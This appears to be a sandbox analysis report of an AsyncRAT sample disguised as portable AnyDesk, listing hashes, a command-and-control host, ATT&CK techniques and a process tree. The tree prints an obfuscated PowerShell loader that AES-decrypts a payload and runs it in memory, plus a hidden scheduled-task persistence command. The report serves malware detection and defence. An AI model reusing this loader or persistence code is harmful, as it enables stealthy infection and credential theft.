asyncrat | 5a8a76a01446c6a7f89d3bfcb7e97a1e3f559251912c7faeab16ca5b1cf119ae

Analysis

max time kernel
1794s
max time network
1797s
platform
windows10-1703_x64
resource
win10-20240404-uk
resource tags

arch:x64arch:x86image:win10-20240404-uklocale:uk-uaos:windows10-1703-x64systemwindows
submitted
23-05-2024 11:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

AnyDesk 8.0.3 (2023) PC/AnyDeskportable.exe
Size

230KB
MD5

ca8c6b0b2682eaf62b2383e113193a26
SHA1

887d4e0fa98c55904e0b6948be885c679ce00a5e
SHA256

e69a5d78906152de49b910d881b6c894cf8cd8dcd575c5c12a0616070884c18c
SHA512

75c7523b184d435d3c21893a5c1df57c3b2829e25507c8b3964f709ed1f48c4337f04bed6b0f1e737980c6e1010b6ee3860ecae1a584a933cfde9fcc79bc923d
SSDEEP

3072:72f5n2nHpJe2Z8B7EZ7sUKk/9j1CfT3o4JmV:iiHpJWBEsUKkFs3s

Score

10^/10

asyncrat newtor execution rat spyware stealer

Malware Config

Extracted

Family

asyncrat

Version

| Edit 3LOSH RAT

Botnet

NEWTOR

torenta2.vpndns.net:115

Mutex

AsyncMutex_6SI8OkPnk

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Async RAT payload 1 IoCs

rat

Processes:

resource	yara_rule
behavioral1/memory/2368-355-0x0000029F9C820000-0x0000029F9C836000-memory.dmp	family_asyncrat

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

4440 powershell.exe
Executes dropped EXE 2 IoCs

Processes:

setup.bat.exestartup_str_257.bat.exe

pid process

3408 setup.bat.exe
2368 startup_str_257.bat.exe
Loads dropped DLL 2 IoCs

Processes:

AnyDeskportable.exeAnyDeskportable.exe

pid process

1976 AnyDeskportable.exe
2924 AnyDeskportable.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
4440	powershell.exe

pid	process
3408	setup.bat.exe
2368	startup_str_257.bat.exe

pid	process
1976	AnyDeskportable.exe
2924	AnyDeskportable.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

AnyDeskportable.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AnyDeskportable.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	AnyDeskportable.exe

Modifies registry class 1 IoCs

Processes:

setup.bat.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings setup.bat.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings	setup.bat.exe

Suspicious behavior: EnumeratesProcesses 20 IoCs

Processes:

powershell.exesetup.bat.exepowershell.exeAnyDeskportable.exepowershell.exestartup_str_257.bat.exepowershell.exe

pid	process
1420	powershell.exe
1420	powershell.exe
1420	powershell.exe
3408	setup.bat.exe
3408	setup.bat.exe
3408	setup.bat.exe
3096	powershell.exe
2924	AnyDeskportable.exe
2924	AnyDeskportable.exe
3096	powershell.exe
3096	powershell.exe
4440	powershell.exe
4440	powershell.exe
4440	powershell.exe
2368	startup_str_257.bat.exe
2368	startup_str_257.bat.exe
2368	startup_str_257.bat.exe
1488	powershell.exe
1488	powershell.exe
1488	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

startup_str_257.bat.exe

pid process

2368 startup_str_257.bat.exe

pid	process
2368	startup_str_257.bat.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exesetup.bat.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1420	powershell.exe
Token: SeIncreaseQuotaPrivilege	1420	powershell.exe
Token: SeSecurityPrivilege	1420	powershell.exe
Token: SeTakeOwnershipPrivilege	1420	powershell.exe
Token: SeLoadDriverPrivilege	1420	powershell.exe
Token: SeSystemProfilePrivilege	1420	powershell.exe
Token: SeSystemtimePrivilege	1420	powershell.exe
Token: SeProfSingleProcessPrivilege	1420	powershell.exe
Token: SeIncBasePriorityPrivilege	1420	powershell.exe
Token: SeCreatePagefilePrivilege	1420	powershell.exe
Token: SeBackupPrivilege	1420	powershell.exe
Token: SeRestorePrivilege	1420	powershell.exe
Token: SeShutdownPrivilege	1420	powershell.exe
Token: SeDebugPrivilege	1420	powershell.exe
Token: SeSystemEnvironmentPrivilege	1420	powershell.exe
Token: SeRemoteShutdownPrivilege	1420	powershell.exe
Token: SeUndockPrivilege	1420	powershell.exe
Token: SeManageVolumePrivilege	1420	powershell.exe
Token: 33	1420	powershell.exe
Token: 34	1420	powershell.exe
Token: 35	1420	powershell.exe
Token: 36	1420	powershell.exe
Token: SeDebugPrivilege	3408	setup.bat.exe
Token: SeDebugPrivilege	3096	powershell.exe
Token: SeIncreaseQuotaPrivilege	3096	powershell.exe
Token: SeSecurityPrivilege	3096	powershell.exe
Token: SeTakeOwnershipPrivilege	3096	powershell.exe
Token: SeLoadDriverPrivilege	3096	powershell.exe
Token: SeSystemProfilePrivilege	3096	powershell.exe
Token: SeSystemtimePrivilege	3096	powershell.exe
Token: SeProfSingleProcessPrivilege	3096	powershell.exe
Token: SeIncBasePriorityPrivilege	3096	powershell.exe
Token: SeCreatePagefilePrivilege	3096	powershell.exe
Token: SeBackupPrivilege	3096	powershell.exe
Token: SeRestorePrivilege	3096	powershell.exe
Token: SeShutdownPrivilege	3096	powershell.exe
Token: SeDebugPrivilege	3096	powershell.exe
Token: SeSystemEnvironmentPrivilege	3096	powershell.exe
Token: SeRemoteShutdownPrivilege	3096	powershell.exe
Token: SeUndockPrivilege	3096	powershell.exe
Token: SeManageVolumePrivilege	3096	powershell.exe
Token: 33	3096	powershell.exe
Token: 34	3096	powershell.exe
Token: 35	3096	powershell.exe
Token: 36	3096	powershell.exe
Token: SeDebugPrivilege	4440	powershell.exe
Token: SeIncreaseQuotaPrivilege	4440	powershell.exe
Token: SeSecurityPrivilege	4440	powershell.exe
Token: SeTakeOwnershipPrivilege	4440	powershell.exe
Token: SeLoadDriverPrivilege	4440	powershell.exe
Token: SeSystemProfilePrivilege	4440	powershell.exe
Token: SeSystemtimePrivilege	4440	powershell.exe
Token: SeProfSingleProcessPrivilege	4440	powershell.exe
Token: SeIncBasePriorityPrivilege	4440	powershell.exe
Token: SeCreatePagefilePrivilege	4440	powershell.exe
Token: SeBackupPrivilege	4440	powershell.exe
Token: SeRestorePrivilege	4440	powershell.exe
Token: SeShutdownPrivilege	4440	powershell.exe
Token: SeDebugPrivilege	4440	powershell.exe
Token: SeSystemEnvironmentPrivilege	4440	powershell.exe
Token: SeRemoteShutdownPrivilege	4440	powershell.exe
Token: SeUndockPrivilege	4440	powershell.exe
Token: SeManageVolumePrivilege	4440	powershell.exe
Token: 33	4440	powershell.exe

Suspicious use of FindShellTrayWindow 3 IoCs

Processes:

AnyDeskportable.exe

pid process

1976 AnyDeskportable.exe
1976 AnyDeskportable.exe
1976 AnyDeskportable.exe
Suspicious use of SendNotifyMessage 3 IoCs

Processes:

AnyDeskportable.exe

pid process

1976 AnyDeskportable.exe
1976 AnyDeskportable.exe
1976 AnyDeskportable.exe

pid	process
1976	AnyDeskportable.exe
1976	AnyDeskportable.exe
1976	AnyDeskportable.exe

pid	process
1976	AnyDeskportable.exe
1976	AnyDeskportable.exe
1976	AnyDeskportable.exe

Suspicious use of WriteProcessMemory 27 IoCs

Processes:

AnyDeskportable.execmd.exeAnyDeskportable.exesetup.bat.exeWScript.execmd.exestartup_str_257.bat.exe

description	pid	process	target process
PID 4280 wrote to memory of 1420	4280	AnyDeskportable.exe	powershell.exe
PID 4280 wrote to memory of 1420	4280	AnyDeskportable.exe	powershell.exe
PID 4280 wrote to memory of 2880	4280	AnyDeskportable.exe	cmd.exe
PID 4280 wrote to memory of 2880	4280	AnyDeskportable.exe	cmd.exe
PID 4280 wrote to memory of 680	4280	AnyDeskportable.exe	AnyDeskportable.exe
PID 4280 wrote to memory of 680	4280	AnyDeskportable.exe	AnyDeskportable.exe
PID 4280 wrote to memory of 680	4280	AnyDeskportable.exe	AnyDeskportable.exe
PID 2880 wrote to memory of 3408	2880	cmd.exe	setup.bat.exe
PID 2880 wrote to memory of 3408	2880	cmd.exe	setup.bat.exe
PID 680 wrote to memory of 2924	680	AnyDeskportable.exe	AnyDeskportable.exe
PID 680 wrote to memory of 2924	680	AnyDeskportable.exe	AnyDeskportable.exe
PID 680 wrote to memory of 2924	680	AnyDeskportable.exe	AnyDeskportable.exe
PID 680 wrote to memory of 1976	680	AnyDeskportable.exe	AnyDeskportable.exe
PID 680 wrote to memory of 1976	680	AnyDeskportable.exe	AnyDeskportable.exe
PID 680 wrote to memory of 1976	680	AnyDeskportable.exe	AnyDeskportable.exe
PID 3408 wrote to memory of 3096	3408	setup.bat.exe	powershell.exe
PID 3408 wrote to memory of 3096	3408	setup.bat.exe	powershell.exe
PID 3408 wrote to memory of 4440	3408	setup.bat.exe	powershell.exe
PID 3408 wrote to memory of 4440	3408	setup.bat.exe	powershell.exe
PID 3408 wrote to memory of 3384	3408	setup.bat.exe	WScript.exe
PID 3408 wrote to memory of 3384	3408	setup.bat.exe	WScript.exe
PID 3384 wrote to memory of 2876	3384	WScript.exe	cmd.exe
PID 3384 wrote to memory of 2876	3384	WScript.exe	cmd.exe
PID 2876 wrote to memory of 2368	2876	cmd.exe	startup_str_257.bat.exe
PID 2876 wrote to memory of 2368	2876	cmd.exe	startup_str_257.bat.exe
PID 2368 wrote to memory of 1488	2368	startup_str_257.bat.exe	powershell.exe
PID 2368 wrote to memory of 1488	2368	startup_str_257.bat.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\AnyDesk 8.0.3 (2023) PC\AnyDeskportable.exe
"C:\Users\Admin\AppData\Local\Temp\AnyDesk 8.0.3 (2023) PC\AnyDeskportable.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4280

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1420

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\setup.bat" "
2⤵
- Suspicious use of WriteProcessMemory
PID:2880

C:\Users\Admin\AppData\Local\Temp\setup.bat.exe
"setup.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $_A_BjKdg = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\setup.bat').Split([Environment]::NewLine);foreach ($_A_hfGRk in $_A_BjKdg) { if ($_A_hfGRk.StartsWith(':: @')) { $_A_BOYqP = $_A_hfGRk.Substring(4); break; }; };$_A_BOYqP = [System.Text.RegularExpressions.Regex]::Replace($_A_BOYqP, '_A_', '');$_A_IPOBz = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_A_BOYqP);$_A_TIXkQ = New-Object System.Security.Cryptography.AesManaged;$_A_TIXkQ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$_A_TIXkQ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$_A_TIXkQ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uokJBwwXkSRKaYgPVEGk265v/cS9N0sFhU2OoLmepew=');$_A_TIXkQ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lckaL1OJsWsKP+vaHcQjNg==');$_A_pOmjo = $_A_TIXkQ.CreateDecryptor();$_A_IPOBz = $_A_pOmjo.TransformFinalBlock($_A_IPOBz, 0, $_A_IPOBz.Length);$_A_pOmjo.Dispose();$_A_TIXkQ.Dispose();$_A_Obvgy = New-Object System.IO.MemoryStream(, $_A_IPOBz);$_A_IKvlO = New-Object System.IO.MemoryStream;$_A_rzFfD = New-Object System.IO.Compression.GZipStream($_A_Obvgy, [IO.Compression.CompressionMode]::Decompress);$_A_rzFfD.CopyTo($_A_IKvlO);$_A_rzFfD.Dispose();$_A_Obvgy.Dispose();$_A_IKvlO.Dispose();$_A_IPOBz = $_A_IKvlO.ToArray();$_A_aTTbu = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_A_IPOBz);$_A_OsTAO = $_A_aTTbu.EntryPoint;$_A_OsTAO.Invoke($null, (, [string[]] ('')))
3⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3408

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\setup')
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3096

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_257_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_257.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4440

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_257.vbs"
4⤵
- Suspicious use of WriteProcessMemory
PID:3384

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_257.bat" "
5⤵
- Suspicious use of WriteProcessMemory
PID:2876

C:\Users\Admin\AppData\Roaming\startup_str_257.bat.exe
"startup_str_257.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $_A_BjKdg = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_257.bat').Split([Environment]::NewLine);foreach ($_A_hfGRk in $_A_BjKdg) { if ($_A_hfGRk.StartsWith(':: @')) { $_A_BOYqP = $_A_hfGRk.Substring(4); break; }; };$_A_BOYqP = [System.Text.RegularExpressions.Regex]::Replace($_A_BOYqP, '_A_', '');$_A_IPOBz = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_A_BOYqP);$_A_TIXkQ = New-Object System.Security.Cryptography.AesManaged;$_A_TIXkQ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$_A_TIXkQ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$_A_TIXkQ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uokJBwwXkSRKaYgPVEGk265v/cS9N0sFhU2OoLmepew=');$_A_TIXkQ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lckaL1OJsWsKP+vaHcQjNg==');$_A_pOmjo = $_A_TIXkQ.CreateDecryptor();$_A_IPOBz = $_A_pOmjo.TransformFinalBlock($_A_IPOBz, 0, $_A_IPOBz.Length);$_A_pOmjo.Dispose();$_A_TIXkQ.Dispose();$_A_Obvgy = New-Object System.IO.MemoryStream(, $_A_IPOBz);$_A_IKvlO = New-Object System.IO.MemoryStream;$_A_rzFfD = New-Object System.IO.Compression.GZipStream($_A_Obvgy, [IO.Compression.CompressionMode]::Decompress);$_A_rzFfD.CopyTo($_A_IKvlO);$_A_rzFfD.Dispose();$_A_Obvgy.Dispose();$_A_IKvlO.Dispose();$_A_IPOBz = $_A_IKvlO.ToArray();$_A_aTTbu = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_A_IPOBz);$_A_OsTAO = $_A_aTTbu.EntryPoint;$_A_OsTAO.Invoke($null, (, [string[]] ('')))
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of WriteProcessMemory
PID:2368

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\startup_str_257')
7⤵
- Suspicious behavior: EnumeratesProcesses
PID:1488

C:\Users\Admin\AppData\Local\Temp\AnyDesk 8.0.3 (2023) PC\data\AnyDeskportable.exe
"data/AnyDeskportable.exe"
2⤵
- Checks processor information in registry
- Suspicious use of WriteProcessMemory
PID:680

C:\Users\Admin\AppData\Local\Temp\AnyDesk 8.0.3 (2023) PC\data\AnyDeskportable.exe
"C:\Users\Admin\AppData\Local\Temp\AnyDesk 8.0.3 (2023) PC\data\AnyDeskportable.exe" --local-service
3⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:2924

C:\Users\Admin\AppData\Local\Temp\AnyDesk 8.0.3 (2023) PC\data\AnyDeskportable.exe
"C:\Users\Admin\AppData\Local\Temp\AnyDesk 8.0.3 (2023) PC\data\AnyDeskportable.exe" --local-control
3⤵
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1976

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

System Information Discovery

T1082

Query Registry

T1012

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
1ac24e18ba8f28294b03a8b9dd9c69b2

SHA1
0a734cc87ca04f2643803cfeb970e6d0b971a2b1

SHA256
950b820b242f63a957f37d804051a7e7ebfffffecb4538556e7b940eaefefd2c

SHA512
2d267526a5fe91f718dacb7d6d04fec5f2aa3bacebb4974fee73e405f203e514666a44da8e34328cee2b30a3c857130f2a9f70faf23ff4ebbeb1f6dac5f91ef0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
a3239667fbd0f1ca57cbe66985aa2898

SHA1
9cfb9d826b7dab1e41e85da0092ab3c497179d7f

SHA256
13e5fe2dbbba94f9474aab71a410b106d94e60dfec5b956ebf8ca15d7820cb22

SHA512
8dad88876d3396c447c3e17c976fa4c715b38ad2f0eeb0897e3ad78cfa26b40459b00dfa902d7b99f001c020a3d61aec8ad3695ce3936f2f3d741c726a9f9d49

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
54a0eaf2960a84c60cc78ba24afd3abd

SHA1
77c69fdb49bcc49e675afdec057c5c6302c7ebbb

SHA256
56871cfec4906f0545e3539f9377108296ce27c8e67bdf7bef198d45b2224a82

SHA512
9144b5ad2e7efe0a98b50204bbfa6cf9cf3644dbadc8474a998341e646f784670565a030e4d0e2c3201e652370156f8358f4840b9ad491c4239dcbcf53c2fbac

Download Submit
C:\Users\Admin\AppData\Local\Temp\AnyDesk 8.0.3 (2023) PC\data\gcapi.dll
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4cwdvow1.wxn.ps1
Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\gcapi.dll
Filesize
385KB

MD5
1ce7d5a1566c8c449d0f6772a8c27900

SHA1
60854185f6338e1bfc7497fd41aa44c5c00d8f85

SHA256
73170761d6776c0debacfbbc61b6988cb8270a20174bf5c049768a264bb8ffaf

SHA512
7e3411be8614170ae91db1626c452997dc6db663d79130872a124af982ee1d457cefba00abd7f5269adce3052403be31238aecc3934c7379d224cb792d519753

Download Submit
C:\Users\Admin\AppData\Local\Temp\setup.bat
Filesize
261KB

MD5
f07a3f5270d4eaaab6b0f9f492278b6d

SHA1
be18e4a572beadf376afe893cd790fd8c8e23251

SHA256
2cb40e7f791275cd2735bc405de4686d5bcecb07bae643d5df8f4ed53c54de19

SHA512
1ff787dd6421d3c6725457056dfbaa8cc49b226c13b164145026e85d3918ccfb0f42e92e03481278911ae6dfd0904fab0903bd7ce9f5efffcc1b8a00204420be

Download Submit
C:\Users\Admin\AppData\Local\Temp\setup.bat.exe
Filesize
435KB

MD5
f7722b62b4014e0c50adfa9d60cafa1c

SHA1
f31c17e0453f27be85730e316840f11522ddec3e

SHA256
ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa

SHA512
7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\ad.trace
Filesize
9KB

MD5
ef2a285900283ec7a644144fc6ec738a

SHA1
050fd103c4d7348a8592e8377d731043a0f986a8

SHA256
2c8841efb6be55f263a13d74ac596faf284e437b3c176929aef510c2b8272188

SHA512
739e30dd0d21dc11a5198160322a59bd6ff6bf7766f51b403852970050c4743eb34a51d6d90c8576aaf9686919b4191f8b010bd6ceedbaea39b400d9867a6e78

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\service.conf
Filesize
2KB

MD5
abc527f25afeee4b0410a151a9e30bba

SHA1
32cb606138fd8fbeee745ff3cff3c7afdc00fa65

SHA256
fae8c1e87a85d6cbd19eac839075a35a61ac14214fadf426ac0c48add8471a78

SHA512
d67b6b36f41d8bdecae62eeb4f640032000193d374f76e3a1f2260e96f20120dba033cbb5261f96052b72b2edeabfb0a9a4c5841778dd5f179a6291d12521f83

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\service.conf
Filesize
2KB

MD5
c0a97e9e519ecc1743c4bc44dd8c10c9

SHA1
f13726803c024750034d61dd947ac55414f81fd0

SHA256
31a49ea4879d533eb71a76668795e8807b397c2bb762046dce2237655d19b7f7

SHA512
92e8be0c83f76dbc516356e2c6b1162b3642ef8fc87ed61d8b2c313a951db59d968fe4d8d6f83420bd5a8507d65f4a8063df9aca90599a605d8a567e28360805

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\system.conf
Filesize
312B

MD5
0c04ad1083dc5c7c45e3ee2cd344ae38

SHA1
f1cf190f8ca93000e56d49732e9e827e2554c46f

SHA256
6452273c017db7cbe0ffc5b109bbf3f8d3282fb91bfa3c5eabc4fb8f1fc98cb0

SHA512
6c414b39bbc1f1f08446c6c6da6f6e1ceb9303bbf183ae279c872d91641ea8d67ec5e5c4e0824da3837eca73ec29fe70e92b72c09458c8ce50fa6f08791d1492

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\system.conf
Filesize
424B

MD5
27bcd2e6471cfd7b369faca093c3d81a

SHA1
fbb17f236bd535a9e3f585314a285cfb32386055

SHA256
a638419e78e3e47aa16b50b6dbdc8cb196d4c158e61a06cc22c2e1fe28a312d8

SHA512
e18c62f763730e5a1ae3c216cdf5c0eae0cda73b391c5e1473a777e89622eeafff6bf0d4d7a9fe5a5817a9832e4360c490f1055f337e30d40d1053269fb93c21

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\system.conf
Filesize
681B

MD5
8961554d36a86e51ad3fe94a660f9c53

SHA1
e664bbfe2fbcc6f7c56641f6506dd98588d57525

SHA256
37141c2c747087f4da50e8ac1c0badd09b2295e00add551a77ff80567a5ec70a

SHA512
00a0d8e7d6c2e3a875bb7eb953155711bd79bed33a3594e9a27f6547f4db526ac7dc70baa139569aea94ef7f28deabf6e1e575ddf3d6c153c137f06f15c6c54e

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\system.conf
Filesize
802B

MD5
10fe6e1d4b2d928c0ec2b369af40a24d

SHA1
cc61e5766440698e6ca22f97d3f8943ac546653c

SHA256
171cc3a1a063619ce18050feec406837a24b554cb0f500a729dfeb49144155e2

SHA512
a427384aa1e3bec9708c5774bc244c72aa49f121eb91d55818e2a24f3ec9d8f705d4e256ae5eb9b8f2a7d3d1ab50a2eac7182c113b578421047e1e7b25e464d2

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf
Filesize
1KB

MD5
46847e3b1604b1ab293201ea22af400e

SHA1
1db4785e5bf82abe027bc99fe610a2a8c9e6e5c4

SHA256
cf78d3ca6465ddeea1e885af7e3a2d37bbac43c383e4969464a2512bc89f615f

SHA512
2b9ee845a34ec87eb36ca1b7527081456c61248d14eeb2295f28aed5626d7073a39c9f8472fd3b7636aa1b27b31e267f3c2f6746c456d36b4248140d351447f8

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf
Filesize
1KB

MD5
af9d97dd7a333870253607722b250d63

SHA1
30bfe07f2aa138f1e15adca3c1a4f0dc48d3c364

SHA256
5b2bf304c169fa05e31b570d33c11bf4634608c31529c2fbbc9ecf9d871484d2

SHA512
d102df23a09135a6dddb809694a2573bb8db0dadbe4045bdccb06676adc16c4166937754a6061341c111d8b53f9323dfe3b7a52c5704dc097d6b5b72d333ef5e

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf
Filesize
1KB

MD5
e06710ef4e12c2d81f90e95b31a2bcd2

SHA1
4aa7085dcab8d192b6c95efc7e74bedb5cab2f75

SHA256
76b5115ccc8980f46d06b536b9550cb28f10e581ce317da5c9c6fe96d4954335

SHA512
4e4c174a34f922f6f4eeb44b9cba0b4801c455f4d6ae99b8df4182eeb3216fae0ca668d15b94eb9b34dd1dd87c0e1f3dcb255186a821c8246580f7f50b344486

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf
Filesize
1KB

MD5
d6c7054662888b1359fe8d68c6053919

SHA1
98b6301aafbbc65e0cbbcb4f47b8954feaa19667

SHA256
06201d649093a7ca4e46b78792017aa62b37a40a1a7c6de514d256479398aeca

SHA512
47d0d88a00fb192870c1b078afbdd3f6e6884437754eb526e4af79186cf1ce6e0b3a111a8db94eff479138ca239faa3ff34670cb29f28f6488386a018c0f79cb

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf
Filesize
1KB

MD5
3c1dffa5ed0537a44156e4df750410a4

SHA1
e050086ba5fbd808dc7af01b561919685fc60158

SHA256
a7454d2966231c9862a96399ba25a5e8e03e37118a0618f271fa34915e7c6d65

SHA512
e15f29ebf6650fe1b5292e337f29c27b948259cee876693dcdae01c99df283dce9065ed281199c55b60217a7ee059a0480e27ab52e66ff249858ff3307f76dda

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf
Filesize
2KB

MD5
4b1c602e3b07b78d03d9b3ac4331c3f0

SHA1
591b87f23f2fb38f5f1f514a1eb4025943e428fa

SHA256
311eed4fb089392f6bffdd031e928f323e442c8407e43e9388cb7e353069e1e9

SHA512
0dbe1f9ea090745994f9ac4d993da963b584673f7a7be70e571061ee2a468daa839bdeaa6cc96f75089e901c1c13ca191688b1ef36e9db7a77a0cc3af47c3f87

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf
Filesize
2KB

MD5
ad217905e069cd99c06a21a676335925

SHA1
58bf662ccc66adaef35c41805ac05ed14f44067f

SHA256
9a2b413e4e795c1003035627c6419d0f9204c7d61ff4180dc429c07b67b3828c

SHA512
004c80e5849be305fa39c37483b366ba5b50033c31a6ce8589440a66c1403ee36564e88a695fd8c5429c8191d8fe2816ac24e60d5575b77bb6480fc374a31334

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf
Filesize
2KB

MD5
6e5cebbb225b03ebd356a18f9107da25

SHA1
9f3f3362f570bd715286708ecf53452c214425a4

SHA256
24fb605820019a29e5aa17bfcad2ec1d3f814ded9d57af6f86698be7a7c1fcfd

SHA512
001d2d8011876e2239cf7b64673ee2836eecac006fca04ca65023d5dd2f8ab3ccdbd78f50bb0c079d198234740e5ae5d94b09a266f1f66c50754e2649b9dc9d9

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf
Filesize
2KB

MD5
764b13af21877344d13125d53fbfa898

SHA1
358bf76d82db5453c449e3dae77de0301a68474d

SHA256
dc11eeeb8d4479f9f794f401d387b08bcc79278040b6f8836bc3c7efb9d1c781

SHA512
